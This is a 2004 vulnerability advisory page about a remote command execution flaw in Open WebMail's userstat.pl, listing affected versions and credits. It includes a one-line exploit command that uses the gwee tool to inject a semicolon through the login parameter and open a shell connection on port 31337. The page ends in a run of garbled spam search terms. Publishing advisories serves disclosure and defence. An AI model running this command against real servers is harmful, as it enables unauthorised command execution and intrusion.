exploits , vulnerabilities , articles , Open WebMail Remote Command Execution Variant Vulnerability

Title	Open WebMail Remote Command Execution Variant Vulnerability
Published	2004-05-10-12:00AM
Updated	2004-05-10-05:47PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this vulnerability has been credited to Nullbyte and Syscalls.
Vulnerable	Open Webmail Open Webmail 2.30 Open Webmail Open Webmail 2.21 Open Webmail Open Webmail 2.20 Open Webmail Open Webmail 1.90 Open Webmail Open Webmail 1.81 Open Webmail Open Webmail 1.71 Open Webmail Open Webmail 1.8 Open Webmail Open Webmail 1.7 Open Webmail Open Webmail current
Not Vulnerable
Code	There is no exploit required. However it is reported that several exploits are in public circulation, additionally it has been demonstrated that 'gwee' (http://cycom.se/dl/gwee), can be used as follows to exploit the issue: $ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:11:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sex st leileiy.cn Xxximage www.sexbab news for c CMS is Fre mrptp.cz.c Foto sarah sex arbek 200 /compo Arundel sex pritty 200 /compo www/.sexwo www.865.js /search/ex vivicagfox GolD_M trojan.age M...g/kant Xxl sex tv kaixin.84y mambo Remo 2.../test. Www.xxx18. aks sexy nude masal Xxl sex tv C99shell www.arab s www.trish news for C Www.xxx18. mambo Remo PHP Advanc www.hhz518 news for c t259t meena hot VIDIO PORN M...g/kant PureFTPd+e php-...at_ 700.sex.xx one repebl pideo vorn \\r\\n26f5 kaila SEX DOG Windows Li